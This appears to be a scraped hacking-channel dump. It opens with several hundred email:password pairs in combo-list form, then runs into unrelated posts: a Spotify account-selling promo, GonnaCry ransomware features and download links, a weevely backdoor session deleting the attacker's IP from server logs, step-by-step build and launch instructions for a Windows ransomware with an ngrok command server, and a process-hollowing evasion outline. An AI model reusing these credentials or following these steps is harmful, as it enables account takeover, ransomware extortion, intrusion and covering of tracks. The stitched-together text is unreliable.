Matteo_Voigt2143@t-online.de:tanner4325
Cesar_Kaiser09721@t-online.de:bella1091
Ernesto_Meier80@hotmail.de:saskia1015
Warren_Walter3138@gmx.com:sex8534
Brayan_Werner9038@hotmail.de:rogers2600
Alvin_Fuchs6703@t-online.de:transport8461
Leonard_Kuhn47@hotmail.de:Curtis7489
Brayson_Majller170@gmx.com:goat2393
Conner_Miller0847@gmx.com:trumpet8182
Yisroel_Kahn28997@gmx.com:phialpha2852
Myles_Herrmann67174@yahoo.com:doors8987
Royce_Schwarz02@gmx.com:bertha7146
Conrad_Maier71@hotmail.de:chantal3586
Yusuf_Schneider99299@gmail.com:77777776653
Javier_Fischer8111@t-online.de:sylvia1861
Duke_Wolf71641@yahoo.com:froggies4750
Davian_Wagner12089@gmx.com:kids7475
Hayes_Kajhler3424@gmx.com:butterfly4393
Wilson_Voigt2074@gmx.com:giselle1291
Tatum_Richter2377@hotmail.de:delano3754
Jensen_Schumacher45422@outlook.de:crawford8637
Chandler_Sauer665@gmx.com:joelle4196
Muhammad_Richter6832@gmx.com:german9166
Gabriel_Schafer0116@hotmail.de:dolphin4178
Mason_Ziegler92771@outlook.de:dharma1461
Clark_Haas5695@t-online.de:buffalo3784
Makai_Vogel2307@t-online.de:19757302
Dylan_Schreiber210@gmail.com:libra7257
Gavin_Stein28@gmx.com:system54498
Devin_Sommer34601@outlook.de:peewee8063
Thatcher_Baumann942@gmx.com:grandma1046
Asa_Friedrich59845@yahoo.com:violin6282
Langston_Baumann2897@hotmail.de:kris3617
Derek_Thomas2399@t-online.de:brain8682
Rocky_Kahn689@gmx.com:keith19248
Van_Kraus54916@outlook.de:superman8568
Rene_Ludwig3665@outlook.de:ohshit4698
Ridge_Kramer34986@yahoo.com:maria11947
Jeremy_Seidel9181@t-online.de:asdfjkl;6155
Sage_Schmitz6520@gmail.com:signal1418
Fletcher_Weiay19@hotmail.de:sayang1695
Clay_Schmitt6893@hotmail.de:babygirl16336
Branson_Wolff3128@outlook.de:donald7300
Decker_Mayer56820@yahoo.com:hansolo4520
Baylor_Beck2494@t-online.de:gollum3252
Zain_Krause3938@hotmail.de:binky1355
Brett_Richter8554@hotmail.de:snoopy8014
Harlan_Lange4027@gmx.com:joanna1035
Emmanuel_Meyer43786@gmx.com:minou5227
Morgan_Hartmann450@t-online.de:sweet7379
Darwin_Peters19@gmx.com:london1470
Parker_Engel231@hotmail.de:gustavo1938
Esteban_Zimmermann130@t-online.de:dork1020
Melvin_Pohl54@outlook.de:misty7155
Clay_Kahn46@outlook.de:zombie1166
Ira_Scholz8303@hotmail.de:trombone4236
Shawn_Dietrich63@hotmail.de:foobar7802
Julio_Koch888@yahoo.com:12139386
Moises_Schuster62@yahoo.com:maine3938
Quinn_Seidel42882@hotmail.de:aliens7173
Nathan_Lehmann762@t-online.de:iloveyou!3569
Mohamed_Weiay40168@gmx.com:dreams8706
Douglas_Schmitz62054@hotmail.de:panther7176
Yehuda_Haas07@gmx.com:strat1843
Rashad_Schmitz92@hotmail.de:tattoo3895
Josue_Kaiser93249@hotmail.de:winona5731
Jett_Simon6723@gmail.com:david14884
Griffin_Haas70761@outlook.de:Family7282
Jedidiah_Huber50@yahoo.com:ryan2414
Bodhi_Beck2790@hotmail.de:travis7590
Dimitri_Graf17210@yahoo.com:alexis7974
Abdullah_Ludwig27@gmail.com:mike2747
Brycen_Lang349@gmx.com:alpine7065
Miles_Ludwig41949@hotmail.de:gateway9510
Kristian_Engel49@gmx.com:rhonda1001
Remington_Thomas58@outlook.de:simple8159
Toby_Albrecht16892@outlook.de:dollars9936
Aron_Schumacher43@yahoo.com:sniper1653
Finnegan_Meyer12557@t-online.de:gilbert2916
Grayson_Lehmann7107@gmx.com:faust1118
Jaxxon_Simon6676@outlook.de:summer7070
William_Braun7860@yahoo.com:chelsea8938
Lucca_Hofmann095@gmail.com:01234568455
Kian_Schubert3866@gmx.com:windsurf3288
Ledger_Schafer32@yahoo.com:reggie1503
Alexis_Vogel19@outlook.de:fernanda7765
Anderson_Majller71@t-online.de:neutrino6119
Kieran_Becker59672@outlook.de:patches3261
Isaiah_Kaiser7844@t-online.de:hugo8690
Fabian_Wolff79@outlook.de:deliver1638
Manuel_Lorenz96566@yahoo.com:abigail6644
Luciano_Hofmann49532@outlook.de:poppy2663
Chris_Krager21@gmail.com:kermit6181
Milo_Sauer5433@hotmail.de:golf4313
Cyrus_Wolff0968@hotmail.de:50cent8151
Cason_Krause92084@outlook.de:kristine3931
Josiah_Schmidt8417@outlook.de:2525253965
Ismael_Beck23@gmx.com:butterfly17412
Beau_Kraus2757@yahoo.com:signature7234
Abdiel_Schrajder600@gmail.com:germany19940
Zachariah_Weiay192@hotmail.de:q1w2e3r42816
Brody_Schulz8835@yahoo.com:marlon7667
Korbin_Horn6315@gmail.com:valley2323
Salvatore_Brandt72266@gmx.com:Vincent1018
Trenton_Thomas50@outlook.de:love8768

Yousef_Schrajder3528@outlook.de:kleenex7123
Amari_Arnold20@gmx.com:estelle4416
Marcel_Schmid63@gmail.com:blue2059
Donald_Berger21950@hotmail.de:hoops2730
Giovanni_Schubert8352@gmx.com:science6361
Ares_Sauer20@t-online.de:sunflower4692
Louie_Lehmann305@hotmail.de:rockon1645
Wayne_Ziegler922@outlook.de:kayla4361
Jovanni_Hartmann23@outlook.de:fernando4701
Brayden_Koch76@outlook.de:sweetpea6553
Colby_Pohl29@t-online.de:mine3562
Jaime_Schafer03944@yahoo.com:libra3641
Mohamed_Voigt03137@gmail.com:keeper8484
Kieran_Hofmann7584@hotmail.de:radio5162
Callan_Werner07565@outlook.de:77777779497
Kareem_Lehmann3123@yahoo.com:crusader1190
Jamison_Sauer853@yahoo.com:oliver1348
Graham_Seidel188@gmail.com:alexandra4825
Zane_Seidel85653@t-online.de:maurice9364
Maurice_Baumann1950@yahoo.com:nick7469
Isaac_Hartmann80538@yahoo.com:coyote7811
Rocco_Kahn955@gmx.com:7418522605
Finn_Bajhm83@outlook.de:chris5764
Wesley_Hahn87@t-online.de:modem9324
Pierce_Weiay20735@outlook.de:microsoft3781
Dawson_Schmitt260@yahoo.com:phil3402
Franklin_Vogel47800@outlook.de:shakira2850
Dallas_Jung21@yahoo.com:sweden5896
Allan_Keller41007@yahoo.com:miranda7211
Byron_Scholz2156@hotmail.de:edith6672
Augustine_Herrmann67@gmail.com:peter11955
Micah_Huber805@gmail.com:coltrane2945
Frank_Krause3826@hotmail.de:fatboy8727
Reagan_Hofmann5642@outlook.de:santos5710
Gerardo_Wolf2423@t-online.de:blackjack2332
Foster_Schulze440@gmx.com:kevin16723
Toby_Vogt3678@hotmail.de:nike2009
Dennis_Schmidt37@gmx.com:melody5555
Kamari_Wolf49388@hotmail.de:kids3662
Angelo_Vogel9812@gmx.com:shawn1118
Ryland_Miller37@t-online.de:wolf15648
Deandre_Kajhler21400@yahoo.com:squash1402
Khari_Schwarz75@outlook.de:lincoln5571
Judah_Otto48@gmail.com:dancing2895
Baylor_Otto62255@outlook.de:mahalkita4113
Jase_Kuhn3581@gmail.com:andres4863
Hezekiah_Kaiser870@outlook.de:7894561233056
Maximiliano_Pfeiffer91884@gmx.com:munchkin5051
Eli_Werner1687@t-online.de:nicklaus2485
Brian_Vogel5669@t-online.de:theatre8371
Alex_Hartmann1184@gmx.com:julien4958
Tucker_Graf02956@hotmail.de:1236541550
Baylor_Schmidt7507@hotmail.de:lori3860
Taylor_Weiay3177@gmx.com:4561233619
Gregory_Winkler151@hotmail.de:house9290
Jesus_Ganther7966@gmx.com:gatita6404
Rowen_Zimmermann06@yahoo.com:blink1827489
Emmet_Seidel1563@t-online.de:melina3817
Maverick_Herrmann01@gmail.com:stacey9351
Branson_Weber21251@outlook.de:watson1439
Cayson_Kuhn955@outlook.de:drowssap7601
Jaxson_Ganther01@t-online.de:Freddy1240
Steven_Kaiser63@gmx.com:newyork9526
Tyler_Mayer47504@gmail.com:davids9400
Royal_Scholz04@gmail.com:whisky7155
Alberto_Schuster1856@gmail.com:7894561236075
Rhys_Martin04@outlook.de:remote7497
Terry_Kaiser16825@outlook.de:forward7743
Joseph_Schulz5223@outlook.de:jewels5308
Ray_Schneider348@outlook.de:spitfire5562
Greyson_Huber5245@gmx.com:Jessica8574
Keegan_Schmidt20@t-online.de:crawford1785
Bowen_Pfeiffer821@hotmail.de:cleo1261
Hassan_Stein8956@outlook.de:lucky79482
Damien_Mayer0825@hotmail.de:groovy1241
Rodney_Frank06@gmx.com:alfredo2701
Hugo_Friedrich777@hotmail.de:class4172
Abram_Beck10@yahoo.com:victory2628
James_Hartmann624@gmx.com:longer6390
Lucca_Kajhler260@yahoo.com:kayla6777
Maximilian_Frank2423@gmail.com:poohbear1680
Khalid_Brandt149@yahoo.com:biteme9936
Conrad_Graf60264@yahoo.com:something3005
Zackary_Richter351@hotmail.de:germany14866
Thatcher_Kahn88340@yahoo.com:kittycat9551
Josue_Richter51045@yahoo.com:phoenix18540
Kelvin_Thomas76373@yahoo.com:sexygirl8893
Coen_Schmitz3216@gmail.com:zorro9797
Bronson_Kahn2210@gmail.com:spike17525
Shawn_Schuster9264@yahoo.com:money17833
Jaziel_Kuhn247@hotmail.de:cecile8824
Philip_Peters799@gmail.com:raven6015
Camdyn_Lehmann2127@gmx.com:Princess9002
Harrison_Engel5683@hotmail.de:5555559052
Bruce_Schuster4516@hotmail.de:laura5515
Terrell_Kraus86064@hotmail.de:fishing6344
Gideon_Ganther45518@hotmail.de:spike14355
Jack_Pfeiffer80@yahoo.com:hotstuff3756
Greysen_Seidel0103@t-online.de:search8558
Gage_Ludwig62@hotmail.de:passion8959
Corbin_Stein345@yahoo.com:miamor1488
Franklin_Sommer58@t-online.de:anderson7394
Gideon_Voigt42@gmail.com:jethro8050
Tobias_Bajhm69022@yahoo.com:cordelia2133

Colin_Lang869@outlook.de:woody2414
Peyton_Ziegler73954@gmail.com:rambo14963
Marvin_Kramer55545@outlook.de:a123458980
Makai_Seidel9628@t-online.de:silver7574
Kolten_Zimmermann746@gmail.com:sirius2620
Kaysen_Schulte3506@gmail.com:wayne5509
Jeremy_Lehmann45@outlook.de:jordie4045
Kyrie_Mayer1956@gmx.com:redcloud9810
Nicholas_Herrmann28705@t-online.de:1kitty3814
Johnathan_Winkler26455@outlook.de:gaston2202
Douglas_Braun60@gmx.com:seattle3847
Kashton_Becker27161@yahoo.com:rene8732
Malcolm_Mayer3352@gmx.com:gremlin9160
Enoch_Busch82030@outlook.de:jeffrey19161
Dario_Neumann79@gmx.com:josie4933
Rey_Braun06219@hotmail.de:peach1616
Bennett_Jung66746@outlook.de:forest9347
Tate_Berger77@yahoo.com:olivier8369
Mohammed_Thomas38@outlook.de:gravis2595
Byron_Walter98515@yahoo.com:explorer8567
Nickolas_Schulz90@hotmail.de:sammy1932
Adriel_Miller151@yahoo.com:december7896
Alec_Richter65967@t-online.de:catalina2899
Collin_Maier64628@yahoo.com:snuffy3035
Merrick_Wolf831@yahoo.com:pepper6122
Edgar_Roth3702@hotmail.de:slick3694
Sergio_Ziegler442@yahoo.com:johan2246
Angelo_Martin29@t-online.de:sony1453
Raiden_Haas26319@gmx.com:chess2284
Liam_Franke082@gmx.com:Matthew3934
Jace_Busch49661@gmail.com:9999999992336
Winston_Thomas26998@gmail.com:fucker4665
Rowen_Wagner16@outlook.de:skiing7069
Raiden_Frank35@yahoo.com:hillary8607
Leonidas_Miller054@gmail.com:gumby6184
Kohen_Schmitz1960@yahoo.com:robbie1182
Odin_Neumann086@t-online.de:brazil9292
Byron_Krause92@t-online.de:spartan4722
Fletcher_Stein75549@gmail.com:yvonne1504
Brayden_Wolff73@yahoo.com:cunt8047
Emiliano_Keller542@gmail.com:angie2833
Kaysen_Albrecht590@gmx.com:myspace15796
Shane_Schuster02@hotmail.de:maxime5791
Guillermo_Kaiser45@outlook.de:zebras1088
Kendall_Mayer53@hotmail.de:rita7433
Josiah_Friedrich38@t-online.de:turtle1402
Maxwell_Hofmann740@hotmail.de:stingray5434
Josue_Vogt570@gmail.com:oliver6364
Otis_Huber15373@yahoo.com:helene5748
Baylor_Kraus2127@outlook.de:civil4696
Ali_Schulz135@yahoo.com:warriors6008
Demetrius_Kaiser675@t-online.de:photo3863
Tate_Kramer7690@gmail.com:internet7201
Emmet_Pfeiffer14@gmail.com:sound3101
Michael_Scholz9972@gmx.com:tabatha9812
Everett_Keller69766@yahoo.com:sleepy3011
Salvatore_Keller86@gmx.com:starlight6930
Ariel_Maier7251@hotmail.de:sweetheart1402
Vincent_Vogt69036@t-online.de:candy6055
Logan_Mayer02783@outlook.de:impact9276
Ayan_Simon8861@gmail.com:nicolas4447
Yousef_Friedrich00@outlook.de:pamela5654
Kendall_Arnold29@outlook.de:12143288
Gannon_Weber63744@t-online.de:hootie2742
Rohan_Haas140@yahoo.com:1122331172
Saul_Meier87@gmail.com:major7029
Cyrus_Schumacher80607@hotmail.de:starlight2506
Sean_Kahn2928@t-online.de:beans8793
Connor_Martin1770@gmail.com:vampire4766
Alberto_Weiay5330@outlook.de:Fisher6414
Leroy_Schubert585@t-online.de:network2072
Cesar_Kramer952@yahoo.com:otter2370
Dawson_Schwarz96058@gmail.com:unique4154
Edison_Miller886@yahoo.com:bridges5263
Kyle_Schulte6513@gmail.com:hedgehog8751
Zavier_Bajhm00@t-online.de:ashton7784
Decker_Schmitt99@gmx.com:moroni6307
Greyson_Meier05@gmail.com:alina9615
Frederick_Hartmann2650@outlook.de:iris6402
Rowen_Scholz94852@gmx.com:dragon7930
Vincent_Koch71@gmx.com:soccer7197
Winston_Mayer09001@hotmail.de:timothy4987
Sylas_Hoffmann67@gmail.com:nikita2009
Reginald_Schrajder0853@gmail.com:justin1250
Houston_Kuhn4587@hotmail.de:letmein5382
Vincenzo_Becker393@gmail.com:bright1873
Alden_Horn557@yahoo.com:ncc17012368
Kayson_Peters327@gmail.com:casey7472
Musa_Vogel988@yahoo.com:cookie18360
Van_Winter078@outlook.de:peggy8791
Charles_Fuchs58@hotmail.de:zxc1237462
Colin_Kuhn088@yahoo.com:topcat1906
Ayaan_Schulze585@t-online.de:renee2894
Jaxxon_Simon5616@outlook.de:sundance4060
Adonis_Lorenz18581@yahoo.com:freebird3073
Kyler_Schulz6126@outlook.de:california1465
Layton_Scholz29@outlook.de:yukon3011
Moises_Maier06@gmail.com:soccer17157
Tadeo_Kahn1811@hotmail.de:britney6646
Hezekiah_Pfeiffer8213@outlook.de:looking9959
Rhys_Kahn736@yahoo.com:suckme8126
Lawson_Meyer038@t-online.de:lakers7221
Wayne_Horn083@hotmail.de:gasman3434
Jakob_Weber05881@gmail.com:harrypotter3114
Raphael_Kajnig985@t-online.de:mariah7404

Agustin_Koch139@outlook.de:rock2024
Lukas_Wolff786@t-online.de:topcat6710
Tristan_Fuchs61495@gmail.com:dilbert3111
Nickolas_Ziegler63016@yahoo.com:dolphin9552
Kohen_Mayer444@gmail.com:orville6936
Elijah_Kaiser56@t-online.de:Anthony3304
William_Winter36344@t-online.de:burns8618
Simeon_Roth891@yahoo.com:lucky18638
Dominik_Herrmann62@hotmail.de:free1801
Brixton_Ludwig726@t-online.de:people6925
Mike_Martin909@hotmail.de:change3960
Roman_Bauer2487@hotmail.de:Rebecca8415
Briggs_Meier43@hotmail.de:white7267
Dariel_Becker77226@gmail.com:tatiana7396
Dustin_Kajnig60@gmail.com:jackie19946
Koda_Schreiber9397@gmx.com:willow2120
Casen_Hoffmann424@gmx.com:monkey15963
Noel_Schulte31086@gmx.com:reznor7976
Tobias_Sauer4378@t-online.de:captain3986
Cayson_Braun88@gmx.com:branch5940
Kasen_Maier129@outlook.de:hello4289
Castiel_Graf92@hotmail.de:planet8949
Sage_Franke96086@gmx.com:dawn8226
Daxton_Huber1740@yahoo.com:carebear7111
Vicente_Groay48464@gmail.com:lacrosse4924
Jakob_Hofmann085@gmx.com:megan1675
Barrett_Franke6269@outlook.de:aragorn1938
Musa_Herrmann555@hotmail.de:tristan6724
Cayden_Schulte41608@gmail.com:Tennis8995
Aydin_Zimmermann7710@yahoo.com:bianca7209
Orion_Schneider52461@yahoo.com:00074267
Harvey_Klein10338@gmail.com:Nicholas3166
Johnny_Schrajder498@t-online.de:tommy9044
Emmanuel_Ziegler691@outlook.de:shadow8207
Maxim_Ziegler063@hotmail.de:samiam9723
Camron_Schulte57701@gmail.com:pirate3429
Zyaire_Majller598@gmail.com:bonjour7635
Alexis_Koch92590@yahoo.com:paradigm2536
Bodie_Mayer64@yahoo.com:renegade4176
Talon_Pfeiffer39946@yahoo.com:aerobics7309
Layton_Zimmermann900@hotmail.de:theresa5116
Johan_Martin8081@gmx.com:eagles8961
Davion_Haas135@gmail.com:steaua4676
Chaim_Heinrich42@gmx.com:booger8128
Fox_Schulze024@t-online.de:888888887438
Julio_Schulz76632@yahoo.com:estrella2378
Eduardo_Wagner77@hotmail.de:jonathan4890
Darrell_Krause396@gmail.com:warrior4289
Demetrius_Bergmann4453@gmx.com:gumby6713
Santiago_Schulte52@t-online.de:rookie1375
Harold_Sommer71@gmail.com:smurfy1382
Skylar_Zimmermann44@gmx.com:flamingo4417
Miller_Herrmann38@hotmail.de:robert16345
Finnegan_Otto6886@outlook.de:trebor8771
Tate_Berger42053@t-online.de:yvette2385
Kareem_Bergmann71@hotmail.de:frederic8545
Leroy_Fuchs65@hotmail.de:dakota8107
Lyle_Jung19@gmx.com:0070073648
Weston_Kaiser18396@gmail.com:cinema3924
Kai_Sommer92@outlook.de:fishing7285
Joseph_Stein44636@hotmail.de:135795017
Zayne_Schulte55@gmx.com:passwd1992
Legend_Scholz6019@gmail.com:storm4241
Brock_Vogt393@gmx.com:test1236681
Gael_Engel747@t-online.de:britain4294
Uriah_Busch5969@outlook.de:pantera7661
Alberto_Schulte8597@gmail.com:steph3558
Alvin_Schuster823@outlook.de:bailey3684
Raymond_Brandt04@hotmail.de:foster8311
Kody_Kahn7214@gmail.com:lakers3424
Eli_Klein837@gmx.com:chameleon2695
Jefferson_Sauer70574@t-online.de:buffy6125
Bentley_Wolff755@yahoo.com:hotstuff3125
Koda_Voigt9435@outlook.de:bobcat8688
Christopher_Dietrich11754@gmail.com:qwaszx8335
Beckham_Haas873@t-online.de:hummer5568
Rodney_Kajnig8662@gmail.com:escort19655
Warren_Albrecht7839@t-online.de:beaner6340
Tristian_Hahn76@t-online.de:paradigm4225
Emery_Majller213@gmx.com:jesus11977
Ethan_Lang78@outlook.de:test1238641
Israel_Pfeiffer45@gmx.com:iguana5206


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 VERIFIED SPOOTIFY PREMIUM send screanshoats to @Undercode_Testing

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Ransomware Impact on industry2020 :


https://medium.com/@tarcisioma/how-can-a-malware-encrypt-a-company-existence-c7ed584f66b3

How this ransomware encryption scheme works:

https://medium.com/@tarcisioma/ransomware-encryption-techniques-696531d07bb9

How this ransomware works:

https://0x00sec.org/t/how-ransomware-works-and-gonnacry-linux-ransomware/4594

https://medium.com/@tarcisioma/how-ransomware-works-and-gonnacry-linux-ransomware-17f77a549114

Mentions:

https://www.sentinelone.com/blog/sentinelone-detects-prevents-wsl-abuse/

https://hackingvision.com/2017/07/18/gonnacry-linux-ransomware/

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑2020 lINUX ransoware :

🦑FEATURES :
encrypt all user files with AES-256-CBC.
Random AES key and IV for each file.
Works even without internet connection.
Communication with the server to decrypt Client-private-key.
encrypt AES key with client-public-key RSA-2048.
encrypt client-private-key with RSA-2048 server-public-key.
Change computer wallpaper -> Gnome, LXDE, KDE, XFCE.
Decryptor that communicate to server to send keys.
python webserver
Daemon
Dropper
Kill databases

🦑 DOWNLOAD :
https://github.com/tarcisio-marinho/GonnaCry

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How Clean IP address from logs
instagram.com/UndercoDETESTING

This tutorial shows how to clean up the access traces from the logs in a server which which does not allow shell commands execution, provided that the target log file is writable by the user running our agent backdoor.

Configuration
Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
Used modules: file_grep (grep), system_info, file_rm (rm), file_cp (cp)
Session
In the example shared hosting server configuration, the HTTP access log file of the user's virtual host is kept in the ~/logs/ folder.

$ ./weevely.py http://target/agent.php mypassword

[+] weevely 3.0

[+] Target: target
[+] Session: _weevely/sessions/target/agent_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> ls
.
..
htdocs
logs
cpanel
.profile
cgi-bin
member@target:/home/member PHP> cd logs
member@target:/home/member/logs PHP> ls
.
..
access.log
member@target:/home/member/logs PHP>
Now run the system_info command to find out our IP address from which our connection came from.

member@target:/home/member/logs PHP> :system_info -info client_ip
174.122.136.104
member@target:/home/member/logs PHP>
Now run the grep command (an alias for the file_grep module) to find out if our IP address has been logged in the log file.

member@target:/home/member/logs PHP> grep access.log 174.122.136.104
174.122.136.104 - - [21/Apr/2015:20:37:04 +0100] "GET /agent.php HTTP/1.1" 200 443 "http://www.google.co.uz/url?sa=t&rct=j&source=web&cd=136&ved=d7fQaxNTP&ei=qpG-lx-Uque6l97bG_EZfE&usg=FL237uTSYjAc8DC-d971rS4UUPyWV13nyK" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3"
174.122.136.104 - - [21/Apr/2015:20:34:01 +0100] "GET /agent.php HTTP/1.1" 200 443 "http://translate.googleusercontent.com/translate_c?depth=1&rurl=translate.google.com&sl=auto&tl=en&usg=200QawVTBiv_BPoQJdoQhA-yTa66mtGaEA" "Opera/9.52 (Macintosh; Intel Mac OS X; U; pt-BR)"
174.122.136.104 - - [21/Apr/2015:20:28:24 +0100] "GET /agent.php HTTP/1.1" 200 443 "http://www.google.com.uy/url?sa=t&rct=j&source=web&cd=183&ved=DJY1U23wu&ei=GfRq0HsncZ7nn32louwyv0&usg=oYydfzk5nYywMujSFCTAmFvz3i3U7IYMDW" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.4 (build 02647) Firefox/3.5.6 (.NET CLR 3.5.30729)"
We can see the activities from our IP address have been logged. We can run again grep with the -v option to remove our IP from the log which we'll save to a temporary file.

member@target:/home/member/logs PHP> grep access.log -v 174.122.136.104 -output cleaned.log
member@target:/home/member/logs PHP>
Let's test if our IP has been actually removed

member@target:/home/member/logs PHP> grep cleaned.log 174.122.136.104
member@target:/home/member/logs PHP>
Now we can replace the cleaned.log with the real access.log.

member@target:/home/member/logs PHP> rm access.log
member@target:/home/member/logs PHP> cp cleaned.log access.log
member@target:/home/member/logs PHP> rm cleaned.log
Our tracks are now removed from the target log file.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

# ENJOY

T.me/UndercodeTesting

# SUPPORT & SHARE :

T.me/UndercodeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑GOOD RANSOMWARE FOR WINDOWS
> A POC Windows crypto-ransomware (Academic)
t.me/UndercodeTesting

🦑 WHAT IS RANSOMWARE ?

Ransomware is a type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files unless a ransom is paid. More modern ransomware families, collectively categorized as crypto-ransomware, encrypt certain file types on infected systems and forces users to pay the ransom
through certain online payment methods to get a decrypt key.

🦑 FEATURES :

Run in Background (or not)
Encrypt files using AES-256-CTR(Counter Mode) with random IV for each file.
Multithreaded.
RSA-4096 to secure the client/server communication.
Includes an Unlocker.
Optional TOR Proxy support.
Use an AES CTR Cypher with stream encryption to avoid load an entire file into memory.
Walk all drives by default.
Docker image for compilation.

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :


First of all download the project outside your $GOPATH:

git clone github.com/mauri870/ransomware
cd ransomware
If you have Docker skip to the next section.

You need Go at least 1.11.2 with the $GOPATH/bin in your $PATH and $GOROOT pointing to your Go installation folder. For me:

export GOPATH=~/gopath
export PATH=$PATH:$GOPATH/bin
export GOROOT=/usr/local/go
Build the project require a lot of steps, like the RSA key generation, build three binaries, embed manifest files, so, let's leave make do your job:

make deps
make
You can build the server for windows with make -e GOOS=windows.

Docker
./build-docker.sh make
Config Parameters
You can change some of the configs during compilation. Instead of run only make, you can use the following variables:

HIDDEN='-H windowsgui' # optional. If present the malware will run in background

USE_TOR=true # optional. If present the malware will download the Tor proxy and use it to contact the server

SERVER_HOST=mydomain.com # the domain used to connect to your server. localhost, 0.0.0.0, 127.0.0.1 works too if you run the server on the same machine as the malware

SERVER_PORT=8080 # the server port, if using a domain you can set this to 80

GOOS=linux # the target os to compile the server. Eg: darwin, linux, windows
@uNDERCODETesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TUTORIAL HOW TO RUN RANSOWAMRE ON WINDOWS ?

1) First of all lets start our external domain:

ngrok http 8080
This command will give us a url like http://2af7161c.ngrok.io. Keep this command running otherwise the malware won't reach our server.

2) Let's compile the binaries (remember to replace the domain):

make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true
The SERVER_PORT needs to be 80 in this case, since ngrok redirects 2af7161c.ngrok.io:80 to your local server port 8080.

3) After build, a binary called ransomware.exe, and unlocker.exe along with a folder called server will be generated in the bin folder. The execution of ransomware.exe and unlocker.exe (even if you use a diferent GOOS variable during compilation) is locked to windows machines only.

4) Enter the server directory from another terminal and start it:

cd bin/server && ./server --port 8080
To make sure that all is working correctly, make a http request to http://2af7161c.ngrok.io:

curl http://2af7161c.ngrok.io

5) If you see a OK and some logs in the server output you are ready to go.

Now move the ransomware.exe and unlocker.exe to the VM along with some dummy files to test the malware. You can take a look at cmd/common.go to see some configuration options like file extensions to match, directories to scan, skipped folders, max size to match a file among others.

6) Then simply run the ransomware.exe and see the magic happens 😄.

The window that you see can be hidden using the HIDDEN option described in the compilation section.

7) After download, extract and start the Tor proxy, the malware waits until the tor bootstrapping is done and then proceed with the key exchange with the server. The client/server handshake takes place and the client payload, encrypted with an RSA-4096 public key must be correctly decrypted on the server. The victim identification and encryption keys are stored in a Golang embedded database called BoltDB (it also persists on disk). When completed we get into the find, match and encrypt phase, up to N-cores workers start to encrypt files matched by the patterns defined. This proccess is really quick and in seconds all of your files will be gone.

7) The encryption key exchanged with the server was used to encrypt all of your files. Each file has a random primitive called IV, generated individually and saved as the first 16 bytes of the encrypted content. The algorithm used is AES-256-CTR, a good AES cypher with streaming mode of operation such that the file size is left intact.

8) The only two sources of information available about what just happen are the READ_TO_DECRYPT.html and FILES_ENCRYPTED.html in the Desktop.

9) In theory, to decrypt your files you need to send an amount of BTC to the attacker's wallet, followed by a contact sending your ID(located on the file created on desktop). If the attacker can confirm your payment it will possibly(or maybe not) return your encryption key and the unlocker.exe and you can use then to recover your files. This exchange can be accomplished in several ways and WILL NOT be implemented in this project for obvious reasons.

10) Let's suppose you get your encryption key back. To recover the correct key point to the following url:

curl -k http://2af7161c.ngrok.io/api/keys/:id


11) Where :id is your identification stored in the file on desktop. After, run the unlocker.exe by double click and follow the instructions.

That's it, got your files back :)

The server has only two endpoints:

POST api/keys/add - Used by the malware to persist new keys. Some verifications are made, like the verification of the RSA autenticity. Returns 204 (empty content) in case of success or a json error.

GET api/keys/:id - Id is a 32 characters parameter, representing an Id already persisted. Returns a json containing the encryption key or a json error

@uNDERCODETesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Process hollowing: Hiding code in legitimate processes

> Process hollowing is a code injection technique that involves spawning a new instance of a legitimate process and then “hollowing it out”, i.e., replacing the legitimate code with malware.

> Unlike most injection techniques that add a malicious feature to an otherwise normally running process, the result of hollowing is a process that looks legitimate on the outside but is primarily malicious on the inside.
t.me/UndercodeTesting

🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋 :

While there are few known techniques that achieve process hollowing, the most common variant typically follows four steps to achieve stealthy execution of malicious code:

1) The malware spawns a new instance of a legitimate process (e.g., explorer.exe, lsass.exe, etc.), and places it in a suspended state.
The malware then hollows out the memory section in the new (and still suspended) process that holds the base address of the legitimate code.

2) To do this, the malware uses the NtUnmapViewOfSection routine.
It allocates read-write-execute (RWX) memory in the suspended process to prepare for the replacement malicious code.

3) The malware then copies malicious code into the allocated memory. It changes the target address of the first thread to the malicious program’s entry point.

4) When the thread resumes, the malicious code starts running, now disguised as a legitimate process. The malware is then free to delete remnants of itself from disk to avoid detection.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

